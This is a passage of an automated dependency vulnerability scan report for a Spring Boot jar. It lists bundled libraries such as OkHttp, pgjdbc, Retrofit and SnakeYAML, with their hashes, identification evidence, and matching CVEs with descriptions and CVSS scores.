Vladimir Dzhuvinov Low Product pom groupid com.nimbusds Highest Product pom name OAuth 2.0 SDK with OpenID Connect extensions High Product pom organization name Connect2id Ltd. Low Product pom organization url http://connect2id.com Low Product pom url https://bitbucket.org/connect2id/oauth-2.0-sdk-with-openid-connect-extensions Medium Version file version 5.24.1 High Version Manifest build-tag 5.24.1 Low Version Manifest Bundle-Version 5.24.1 High Version Manifest Implementation-Version 5.24.1 High Version pom version 5.24.1 Highest
spring-music-sqldb-1.0.jar: okhttp-3.3.1.jarFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/okhttp-3.3.1.jarMD5: 50504ee05596f03f72ffc7b1c901954dSHA1: 19047bdb6a4fc00a44124f64ca98e88fc204e7e3SHA256: a47f4efa166551cd5acc04f1071d82dafbf05638c21f9ca13068bc6633e3bff6
Evidence Type Source Name Value Confidence Vendor file name okhttp High Vendor jar package name internal Low Vendor jar package name okhttp3 Highest Vendor jar package name okhttp3 Low Vendor pom artifactid okhttp Low Vendor pom groupid com.squareup.okhttp3 Highest Vendor pom name OkHttp High Vendor pom parent-artifactid parent Low Product file name okhttp High Product jar package name internal Low Product jar package name okhttp3 Highest Product pom artifactid okhttp Highest Product pom groupid com.squareup.okhttp3 Highest Product pom name OkHttp High Product pom parent-artifactid parent Medium Version file version 3.3.1 High Version pom version 3.3.1 Highest
CVE-2021-0341 (OSSINDEX) suppress
In verifyHostName of OkHostnameVerifier.java, there is a possible way to accept a certificate for the wrong domain due to improperly used crypto. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-171980069
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2021-0341 for details CWE-295 Improper Certificate Validation
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:com.squareup.okhttp3:okhttp:3.3.1:*:*:*:*:*:*:* CVE-2018-20200 suppress
CertificatePinner.java in OkHttp 3.x through 3.12.0 allows man-in-the-middle attackers to bypass certificate pinning by changing SSLContext and the boolean values while hooking the application. NOTE: This id is disputed because some parties don't consider this is a vulnerability. Their rationale can be found in https://github.com/square/okhttp/issues/4967 CWE-295 Improper Certificate Validation
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N References:
Vulnerable Software & Versions:
CVE-2023-0833 suppress
A flaw was found in Red Hat's AMQ-Streams, which ships a version of the OKHttp component with an information disclosure flaw via an exception triggered by a header containing an illegal value. This issue could allow an authenticated attacker to access information outside of their regular permissions. CWE-209 Generation of Error Message Containing Sensitive Information
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:1.8/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
spring-music-sqldb-1.0.jar: okhttp-urlconnection-3.3.1.jarFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/okhttp-urlconnection-3.3.1.jarMD5: dae63d9ddbe30a1ced59e48a524028acSHA1: 14e70f2069fb98dc60346dd24cb7b6a2e321580dSHA256: 8ca26cc39299a48edc9a4872600df56c94fb3c1f743936f7f3a3daf63e9237c3
Evidence Type Source Name Value Confidence Vendor file name okhttp-urlconnection High Vendor jar package name internal Low Vendor jar package name okhttp3 Highest Vendor jar package name okhttp3 Low Vendor pom artifactid okhttp-urlconnection Low Vendor pom groupid com.squareup.okhttp3 Highest Vendor pom name OkHttp URLConnection High Vendor pom parent-artifactid parent Low Product file name okhttp-urlconnection High Product jar package name internal Low Product jar package name okhttp3 Highest Product pom artifactid okhttp-urlconnection Highest Product pom groupid com.squareup.okhttp3 Highest Product pom name OkHttp URLConnection High Product pom parent-artifactid parent Medium Version file version 3.3.1 High Version pom version 3.3.1 Highest
CVE-2018-20200 suppress
CertificatePinner.java in OkHttp 3.x through 3.12.0 allows man-in-the-middle attackers to bypass certificate pinning by changing SSLContext and the boolean values while hooking the application. NOTE: This id is disputed because some parties don't consider this is a vulnerability. Their rationale can be found in https://github.com/square/okhttp/issues/4967 CWE-295 Improper Certificate Validation
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N References:
Vulnerable Software & Versions:
CVE-2023-0833 suppress
A flaw was found in Red Hat's AMQ-Streams, which ships a version of the OKHttp component with an information disclosure flaw via an exception triggered by a header containing an illegal value. This issue could allow an authenticated attacker to access information outside of their regular permissions. CWE-209 Generation of Error Message Containing Sensitive Information
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:1.8/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
spring-music-sqldb-1.0.jar: okio-1.8.0.jarFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/okio-1.8.0.jarMD5: c03069c230c7a7ebc7b1a3cd2df4d6b3SHA1: 05ea7af56cc7c567ed9856d99efb30740e9b17ffSHA256: 5cfea5afe6c6e441a4dbf6053a07a733b1249d1009382eb44ac2255ccedd0c15
Evidence Type Source Name Value Confidence Vendor file name okio High Vendor jar package name okio Highest Vendor jar package name okio Low Vendor pom artifactid okio Low Vendor pom groupid com.squareup.okio Highest Vendor pom name Okio High Vendor pom parent-artifactid okio-parent Low Product file name okio High Product jar package name okio Highest Product pom artifactid okio Highest Product pom groupid com.squareup.okio Highest Product pom name Okio High Product pom parent-artifactid okio-parent Medium Version file version 1.8.0 High Version pom version 1.8.0 Highest
CVE-2023-3635 suppress
GzipSource does not handle an exception that might be raised when parsing a malformed gzip buffer. This may lead to denial of service of the Okio client when handling a crafted GZIP archive, by using the GzipSource class.
CWE-195 Signed to Unsigned Conversion Error, CWE-681 Incorrect Conversion between Numeric Types
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
spring-music-sqldb-1.0.jar: postgresql-42.2.2.jar (shaded: com.ongres.scram:client:1.0.0-beta.2)File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/postgresql-42.2.2.jar/META-INF/maven/com.ongres.scram/client/pom.xmlMD5: 6a4b184f3b8bf5c818dd05eb6993d59fSHA1: 33634f5a6256d2149aeb052d554698cfdb8b19ebSHA256: 1110d9b8d5b3f961abfb41fd10abbcc081d15c4aa83ccd1aa29369ba8604ee14
Evidence Type Source Name Value Confidence Vendor pom artifactid client Low Vendor pom groupid com.ongres.scram Highest Vendor pom name SCRAM - client High Vendor pom parent-artifactid parent Low Product pom artifactid client Highest Product pom groupid com.ongres.scram Highest Product pom name SCRAM - client High Product pom parent-artifactid parent Medium Version pom version 1.0.0-beta.2 Highest
spring-music-sqldb-1.0.jar: postgresql-42.2.2.jar (shaded: com.ongres.scram:common:1.0.0-beta.2)File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/postgresql-42.2.2.jar/META-INF/maven/com.ongres.scram/common/pom.xmlMD5: 082e0e03a6ecbb961dca5b000df8d7e2SHA1: ef98d7bc51a24f942b9ce52d5db3f75a3daf8466SHA256: e405da7af7f33d41d4b76f0f0a3f427a65139de4abac79e21e92d4297d922dd1
Evidence Type Source Name Value Confidence Vendor pom artifactid common Low Vendor pom groupid com.ongres.scram Highest Vendor pom name SCRAM - common High Vendor pom parent-artifactid parent Low Product pom artifactid common Highest Product pom groupid com.ongres.scram Highest Product pom name SCRAM - common High Product pom parent-artifactid parent Medium Version pom version 1.0.0-beta.2 Highest
spring-music-sqldb-1.0.jar: postgresql-42.2.2.jarDescription:
Java JDBC 4.2 (JRE 8+) driver for PostgreSQL database License:
BSD-2-Clause: https://jdbc.postgresql.org/about/license.html File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/postgresql-42.2.2.jar
MD5: aeaee2a456f269b49d78125d6f492f5d
SHA1: 7ebd60d15eec1f9e796d68212121d92e3dd566b2
SHA256: 1996524026a3027853f3932e8639ef813807d1b63fe14832f410fffa4274fa70
Evidence Type Source Name Value Confidence Vendor file name postgresql High Vendor jar package name core Highest Vendor jar package name driver Highest Vendor jar package name jdbc Highest Vendor jar package name postgresql Highest Vendor Manifest bundle-copyright Copyright (c) 2003-2015, PostgreSQL Global Development Group Low Vendor Manifest bundle-docurl https://jdbc.postgresql.org/ Low Vendor Manifest bundle-symbolicname org.postgresql.jdbc42 Medium Vendor Manifest Implementation-Vendor PostgreSQL Global Development Group High Vendor Manifest Implementation-Vendor-Id org.postgresql Medium Vendor Manifest provide-capability osgi.service;effective:=active;objectClass="org.osgi.service.jdbc.DataSourceFactory" Low Vendor Manifest specification-vendor Oracle Corporation Low Vendor pom artifactid postgresql Low Vendor pom groupid org.postgresql Highest Vendor pom name PostgreSQL JDBC Driver - JDBC 4.2 High Vendor pom organization name PostgreSQL Global Development Group High Vendor pom organization url https://jdbc.postgresql.org/ Medium Vendor pom parent-artifactid pgjdbc-core-parent Low Vendor pom url pgjdbc/pgjdbc Highest Product file name postgresql High Product jar package name core Highest Product jar package name driver Highest Product jar package name jdbc Highest Product jar package name osgi Highest Product jar package name postgresql Highest Product Manifest bundle-copyright Copyright (c) 2003-2015, PostgreSQL Global Development Group Low Product Manifest bundle-docurl https://jdbc.postgresql.org/ Low Product Manifest Bundle-Name PostgreSQL JDBC Driver JDBC42 Medium Product Manifest bundle-symbolicname org.postgresql.jdbc42 Medium Product Manifest Implementation-Title PostgreSQL JDBC Driver - JDBC 4.2 High Product Manifest provide-capability osgi.service;effective:=active;objectClass="org.osgi.service.jdbc.DataSourceFactory" Low Product Manifest specification-title JDBC Medium Product pom artifactid postgresql Highest Product pom groupid org.postgresql Highest Product pom name PostgreSQL JDBC Driver - JDBC 4.2 High Product pom organization name PostgreSQL Global Development Group Low Product pom organization url https://jdbc.postgresql.org/ Low Product pom parent-artifactid pgjdbc-core-parent Medium Product pom url pgjdbc/pgjdbc High Version file version 42.2.2 High Version Manifest Bundle-Version 42.2.2 High Version Manifest Implementation-Version 42.2.2 High Version pom parent-version 42.2.2 Low Version pom version 42.2.2 Highest
CVE-2022-26520 (OSSINDEX) suppress
In pgjdbc before 42.3.3, an attacker (who controls the jdbc URL or properties) can call java.util.logging.FileHandler to write to arbitrary files through the loggerFile and loggerLevel connection properties. An example situation is that an attacker could create an executable JSP file under a Tomcat web root. NOTE: the vendor's position is that there is no pgjdbc vulnerability; instead, it is a vulnerability for any application to use the pgjdbc driver with untrusted connection properties
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2022-26520 for details CWE-noinfo
CVSSv3:
Base Score: CRITICAL (9.800000190734863) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.postgresql:postgresql:42.2.2:*:*:*:*:*:*:* CVE-2022-21724 suppress
pgjdbc is the offical PostgreSQL JDBC Driver. A security hole was found in the jdbc driver for postgresql database while doing security research. The system using the postgresql library will be attacked when attacker control the jdbc url or properties. pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties. However, the driver did not verify if the class implements the expected interface before instantiating the class. This can lead to code execution loaded via arbitrary classes. Users using plugins are advised to upgrade. There are no known workarounds for this issue. CWE-665 Improper Initialization
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2024-1597 suppress
pgjdbc, the PostgreSQL JDBC Driver, allows attacker to inject SQL if using PreferQueryMode=SIMPLE. Note this is not the default. In the default mode there is no vulnerability. A placeholder for a numeric value must be immediately preceded by a minus. There must be a second placeholder for a string value after the first placeholder; both must be on the same line. By constructing a matching string payload, the attacker can inject SQL to alter the query,bypassing the protections that parameterized queries bring against SQL Injection attacks. Versions before 42.7.2, 42.6.1, 42.5.5, 42.4.4, 42.3.9, and 42.2.28 are affected. CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2018-10936 suppress
A weakness was found in postgresql-jdbc before version 42.2.5. It was possible to provide an SSL Factory and not check the host name if a host name verifier was not provided to the driver. This could lead to a condition where a man-in-the-middle attacker could masquerade as a trusted server by providing a certificate for the wrong host, as long as it was signed by a trusted CA. CWE-297 Improper Validation of Certificate with Host Mismatch
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions:
CVE-2022-31197 suppress
PostgreSQL JDBC Driver (PgJDBC for short) allows Java programs to connect to a PostgreSQL database using standard, database independent Java code. The PGJDBC implementation of the `java.sql.ResultRow.refreshRow()` method is not performing escaping of column names so a malicious column name that contains a statement terminator, e.g. `;`, could lead to SQL injection. This could lead to executing additional SQL commands as the application's JDBC user. User applications that do not invoke the `ResultSet.refreshRow()` method are not impacted. User application that do invoke that method are impacted if the underlying database that they are querying via their JDBC application may be under the control of an attacker. The attack requires the attacker to trick the user into executing SQL against a table name who's column names would contain the malicious SQL and subsequently invoke the `refreshRow()` method on the ResultSet. Note that the application's JDBC user and the schema owner need not be the same. A JDBC application that executes as a privileged user querying database schemas owned by potentially malicious less-privileged users would be vulnerable. In that situation it may be possible for the malicious user to craft a schema that causes the application to execute commands as the privileged user. Patched versions will be released as `42.2.26` and `42.4.1`. Users are advised to upgrade. There are no known workarounds for this issue. CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
CVSSv3:
Base Score: HIGH (8.0) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H/E:2.1/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2020-13692 suppress
PostgreSQL JDBC Driver (aka PgJDBC) before 42.2.13 allows XXE. CWE-611 Improper Restriction of XML External Entity Reference
CVSSv3:
Base Score: HIGH (7.7) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2022-41946 suppress
pgjdbc is an open source postgresql JDBC Driver. In affected versions a prepared statement using either `PreparedStatement.setText(int, InputStream)` or `PreparedStatemet.setBytea(int, InputStream)` will create a temporary file if the InputStream is larger than 2k. This will create a temporary file which is readable by other users on Unix like systems, but not MacOS. On Unix like systems, the system's temporary directory is shared between all users on that system. Because of this, when files and directories are written into this directory they are, by default, readable by other users on that same system. This vulnerability does not allow other users to overwrite the contents of these directories or files. This is purely an information disclosure vulnerability. Because certain JDK file system APIs were only added in JDK 1.7, this this fix is dependent upon the version of the JDK you are using. Java 1.7 and higher users: this vulnerability is fixed in 4.5.0. Java 1.6 and lower users: no patch is available. If you are unable to patch, or are stuck running on Java 1.6, specifying the java.io.tmpdir system environment variable to a directory that is exclusively owned by the executing user will mitigate this vulnerability. CWE-668 Exposure of Resource to Wrong Sphere, CWE-200 Exposure of Sensitive Information to an Unauthorized Actor, CWE-377 Insecure Temporary File
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:1.8/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
spring-music-sqldb-1.0.jar: reactive-streams-1.0.2.jarDescription:
A Protocol for Asynchronous Non-Blocking Data Sequence License:
CC0: http://creativecommons.org/publicdomain/zero/1.0/ File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/reactive-streams-1.0.2.jar
MD5: 022ff8ca0101daeb35c8df9b120ff99e
SHA1: 323964c36556eb0e6209f65c1cef72b53b461ab8
SHA256: cc09ab0b140e0d0496c2165d4b32ce24f4d6446c0a26c5dc77b06bdf99ee8fae
Evidence Type Source Name Value Confidence Vendor central artifactid reactive-streams Highest Vendor central groupid org.reactivestreams Highest Vendor file name reactive-streams High Vendor jar package name reactivestreams Highest Vendor jar package name reactivestreams Low Vendor Manifest automatic-module-name org.reactivestreams Medium Vendor Manifest bundle-docurl http://reactive-streams.org Low Vendor Manifest bundle-symbolicname org.reactivestreams.reactive-streams Medium Vendor pom artifactid reactive-streams Low Vendor pom developer id reactive-streams-sig Medium Vendor pom developer name Reactive Streams SIG Medium Vendor pom groupid org.reactivestreams Highest Vendor pom name reactive-streams High Vendor pom url http://www.reactive-streams.org/ Highest Product central artifactid reactive-streams Highest Product file name reactive-streams High Product jar package name reactivestreams Highest Product Manifest automatic-module-name org.reactivestreams Medium Product Manifest bundle-docurl http://reactive-streams.org Low Product Manifest Bundle-Name reactive-streams Medium Product Manifest bundle-symbolicname org.reactivestreams.reactive-streams Medium Product pom artifactid reactive-streams Highest Product pom developer id reactive-streams-sig Low Product pom developer name Reactive Streams SIG Low Product pom groupid org.reactivestreams Highest Product pom name reactive-streams High Product pom url http://www.reactive-streams.org/ Medium Version central version 1.0.2 Highest Version file version 1.0.2 High Version Manifest Bundle-Version 1.0.2 High Version pom version 1.0.2 Highest
spring-music-sqldb-1.0.jar: reactor-core-3.1.6.RELEASE.jarDescription:
Non-Blocking Reactive Foundation for the JVM License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/reactor-core-3.1.6.RELEASE.jar
MD5: 454d0bf43d43a672d4158fd8a1f8b328
SHA1: 64dfad0f0a0e9022c949d678106d53f083b66d05
SHA256: 8d0b2eff83bf25724befe14744e463ff2bb5a1eb3af06f3b6b328fd6271fb0e4
Evidence Type Source Name Value Confidence Vendor central artifactid reactor-core Highest Vendor central groupid io.projectreactor Highest Vendor file name reactor-core High Vendor jar package name core Highest Vendor jar package name core Low Vendor jar package name publisher Low Vendor jar package name reactor Low Vendor Manifest bundle-symbolicname io.projectreactor.reactor-core Medium Vendor pom artifactid reactor-core Low Vendor pom developer email akarnokd@gmail.com Low Vendor pom developer email rsivaram@pivotal.io Low Vendor pom developer email sbasle@pivotal.io Low Vendor pom developer email sdeleuze@pivotal.io Low Vendor pom developer email smaldini@pivotal.io Low Vendor pom developer id akarnokd Medium Vendor pom developer id rsivaram Medium Vendor pom developer id sdeleuze Medium Vendor pom developer id simonbasle Medium Vendor pom developer id smaldini Medium Vendor pom developer name David Karnok Medium Vendor pom developer name Rajini Sivaram Medium Vendor pom developer name Simon Baslé Medium Vendor pom developer name Stephane Maldini Medium Vendor pom developer name Sébastien Deleuze Medium Vendor pom groupid io.projectreactor Highest Vendor pom name Non-Blocking Reactive Foundation for the JVM High Vendor pom organization name reactor High Vendor pom organization url http://github.com/reactor Medium Vendor pom url reactor/reactor-core Highest Product central artifactid reactor-core Highest Product file name reactor-core High Product jar package name core Highest Product jar package name core Low Product jar package name publisher Low Product jar package name reactor Highest Product Manifest Bundle-Name reactor-core Medium Product Manifest bundle-symbolicname io.projectreactor.reactor-core Medium Product Manifest Implementation-Title reactor-core High Product pom artifactid reactor-core Highest Product pom developer email akarnokd@gmail.com Low Product pom developer email rsivaram@pivotal.io Low Product pom developer email sbasle@pivotal.io Low Product pom developer email sdeleuze@pivotal.io Low Product pom developer email smaldini@pivotal.io Low Product pom developer id akarnokd Low Product pom developer id rsivaram Low Product pom developer id sdeleuze Low Product pom developer id simonbasle Low Product pom developer id smaldini Low Product pom developer name David Karnok Low Product pom developer name Rajini Sivaram Low Product pom developer name Simon Baslé Low Product pom developer name Stephane Maldini Low Product pom developer name Sébastien Deleuze Low Product pom groupid io.projectreactor Highest Product pom name Non-Blocking Reactive Foundation for the JVM High Product pom organization name reactor Low Product pom organization url http://github.com/reactor Low Product pom url reactor/reactor-core High Version central version 3.1.6.RELEASE Highest Version Manifest Bundle-Version 3.1.6.RELEASE High Version Manifest Implementation-Version 3.1.6.RELEASE High Version pom version 3.1.6.RELEASE Highest
spring-music-sqldb-1.0.jar: retrofit-2.1.0.jarFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/retrofit-2.1.0.jarMD5: 9e42632359093667f096c532b1261eaeSHA1: 2de7cd8b95b7021b1d597f049bcb422055119f2cSHA256: b7ae1a8c9f8de27c85ea43238c6c1507e91d33c6411cc52a06b5451842dc28bb
Evidence Type Source Name Value Confidence Vendor file name retrofit High Vendor jar package name retrofit Highest Vendor jar package name retrofit2 Highest Vendor jar package name retrofit2 Low Vendor pom artifactid retrofit Low Vendor pom groupid com.squareup.retrofit2 Highest Vendor pom name Retrofit High Vendor pom parent-artifactid parent Low Product file name retrofit High Product jar package name retrofit Highest Product jar package name retrofit2 Highest Product pom artifactid retrofit Highest Product pom groupid com.squareup.retrofit2 Highest Product pom name Retrofit High Product pom parent-artifactid parent Medium Version file version 2.1.0 High Version pom version 2.1.0 Highest
CVE-2018-1000850 suppress
Square Retrofit version versions from (including) 2.0 and 2.5.0 (excluding) contains a Directory Traversal vulnerability in RequestBuilder class, method addPathParameter that can result in By manipulating the URL an attacker could add or delete resources otherwise unavailable to her.. This attack appear to be exploitable via An attacker should have access to an encoded path parameter on POST, PUT or DELETE request.. This vulnerability appears to have been fixed in 2.5.0 and later. CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.4) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:P References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: rxjava-1.3.8.jarDescription:
rxjava License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/rxjava-1.3.8.jar
MD5: 62b34782c8ce3462d5796da7c1e9a9b5
SHA1: 8c192792ad2e65a90867ab418ac49703f44d2baf
SHA256: 387df880f226b01cea4b1026d96d34e1da27d5801562742cfce0413c21ef7690
Evidence Type Source Name Value Confidence Vendor central artifactid rxjava Highest Vendor central groupid io.reactivex Highest Vendor file name rxjava High Vendor jar package name internal Low Vendor jar package name operators Low Vendor jar package name rx Low Vendor Manifest branch 7e3879abfb32eeebb38c970195a7f1e354eb1f82 Low Vendor Manifest build-date 2018-03-31_15:30:39 Low Vendor Manifest build-host travis-job-7634ec5f-11ac-4d0f-ac92-2fe172437739 Low Vendor Manifest build-job LOCAL Low Vendor Manifest build-number LOCAL Low Vendor Manifest built-os Linux Low Vendor Manifest built-status integration Low Vendor Manifest bundle-docurl https://github.com/ReactiveX/RxJava Low Vendor Manifest bundle-symbolicname io.reactivex.rxjava Medium Vendor Manifest change 7e3879a Low Vendor Manifest module-email benjchristensen@netflix.com Low Vendor Manifest module-origin https://github.com/ReactiveX/RxJava.git Low Vendor Manifest module-owner benjchristensen@netflix.com Low Vendor Manifest module-source Low Vendor pom artifactid rxjava Low Vendor pom developer email benjchristensen@netflix.com Low Vendor pom developer id benjchristensen Medium Vendor pom developer name Ben Christensen Medium Vendor pom groupid io.reactivex Highest Vendor pom name rxjava High Vendor pom url ReactiveX/RxJava Highest Product central artifactid rxjava Highest Product file name rxjava High Product jar package name internal Low Product jar package name operators Low Product Manifest branch 7e3879abfb32eeebb38c970195a7f1e354eb1f82 Low Product Manifest build-date 2018-03-31_15:30:39 Low Product Manifest build-host travis-job-7634ec5f-11ac-4d0f-ac92-2fe172437739 Low Product Manifest build-job LOCAL Low Product Manifest build-number LOCAL Low Product Manifest built-os Linux Low Product Manifest built-status integration Low Product Manifest bundle-docurl https://github.com/ReactiveX/RxJava Low Product Manifest Bundle-Name rxjava Medium Product Manifest bundle-symbolicname io.reactivex.rxjava Medium Product Manifest change 7e3879a Low Product Manifest Implementation-Title io.reactivex#rxjava;1.3.8 High Product Manifest module-email benjchristensen@netflix.com Low Product Manifest module-origin https://github.com/ReactiveX/RxJava.git Low Product Manifest module-owner benjchristensen@netflix.com Low Product Manifest module-source Low Product pom artifactid rxjava Highest Product pom developer email benjchristensen@netflix.com Low Product pom developer id benjchristensen Low Product pom developer name Ben Christensen Low Product pom groupid io.reactivex Highest Product pom name rxjava High Product pom url ReactiveX/RxJava High Version central version 1.3.8 Highest Version file version 1.3.8 High Version Manifest Bundle-Version 1.3.8 High Version Manifest Implementation-Version 1.3.8 High Version pom version 1.3.8 Highest
spring-music-sqldb-1.0.jar: slf4j-api-1.7.25.jarDescription:
The slf4j API File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/slf4j-api-1.7.25.jarMD5: caafe376afb7086dcbee79f780394ca3SHA1: da76ca59f6a57ee3102f8f9bd9cee742973efa8aSHA256: 18c4a0095d5c1da6b817592e767bb23d29dd2f560ad74df75ff3961dbde25b79
Evidence Type Source Name Value Confidence Vendor file name slf4j-api High Vendor jar package name slf4j Highest Vendor Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Vendor Manifest bundle-symbolicname slf4j.api Medium Vendor pom artifactid slf4j-api Low Vendor pom groupid org.slf4j Highest Vendor pom name SLF4J API Module High Vendor pom parent-artifactid slf4j-parent Low Vendor pom url http://www.slf4j.org Highest Product file name slf4j-api High Product jar package name slf4j Highest Product Manifest Bundle-Name slf4j-api Medium Product Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Product Manifest bundle-symbolicname slf4j.api Medium Product Manifest Implementation-Title slf4j-api High Product pom artifactid slf4j-api Highest Product pom groupid org.slf4j Highest Product pom name SLF4J API Module High Product pom parent-artifactid slf4j-parent Medium Product pom url http://www.slf4j.org Medium Version file version 1.7.25 High Version Manifest Bundle-Version 1.7.25 High Version Manifest Implementation-Version 1.7.25 High Version pom version 1.7.25 Highest
spring-music-sqldb-1.0.jar: snakeyaml-1.19.jarDescription:
YAML 1.1 parser and emitter for Java License:
Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/snakeyaml-1.19.jar
MD5: 95472b5a0ded8761545342a087e82117
SHA1: 2d998d3d674b172a588e54ab619854d073f555b5
SHA256: 0a7b1063fcaeb806b40b728d01b9361d38e1ed8deb93f945994fec7c1761dad1
Evidence Type Source Name Value Confidence Vendor file name snakeyaml High Vendor jar package name emitter Highest Vendor jar package name parser Highest Vendor jar package name snakeyaml Highest Vendor jar package name yaml Highest Vendor Manifest bundle-symbolicname org.yaml.snakeyaml Medium Vendor pom artifactid snakeyaml Low Vendor pom developer email alexander.maslov@gmail.com Low Vendor pom developer email jordanangold@gmail.com Low Vendor pom developer email public.somov@gmail.com Low Vendor pom developer id asomov Medium Vendor pom developer id Jordan Medium Vendor pom developer id maslovalex Medium Vendor pom developer name Alexander Maslov Medium Vendor pom developer name Andrey Somov Medium Vendor pom developer name Jordan Angold Medium Vendor pom groupid org.yaml Highest Vendor pom name SnakeYAML High Vendor pom url http://www.snakeyaml.org Highest Product file name snakeyaml High Product jar package name emitter Highest Product jar package name parser Highest Product jar package name snakeyaml Highest Product jar package name yaml Highest Product Manifest Bundle-Name SnakeYAML Medium Product Manifest bundle-symbolicname org.yaml.snakeyaml Medium Product pom artifactid snakeyaml Highest Product pom developer email alexander.maslov@gmail.com Low Product pom developer email jordanangold@gmail.com Low Product pom developer email public.somov@gmail.com Low Product pom developer id asomov Low Product pom developer id Jordan Low Product pom developer id maslovalex Low Product pom developer name Alexander Maslov Low Product pom developer name Andrey Somov Low Product pom developer name Jordan Angold Low Product pom groupid org.yaml Highest Product pom name SnakeYAML High Product pom url http://www.snakeyaml.org Medium Version file version 1.19 High Version pom version 1.19 Highest
CVE-2022-1471 suppress
SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConsturctor when parsing untrusted content to restrict deserialization. We recommend upgrading to version 2.0 and beyond. CWE-502 Deserialization of Untrusted Data, CWE-20 Improper Input Validation
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions:
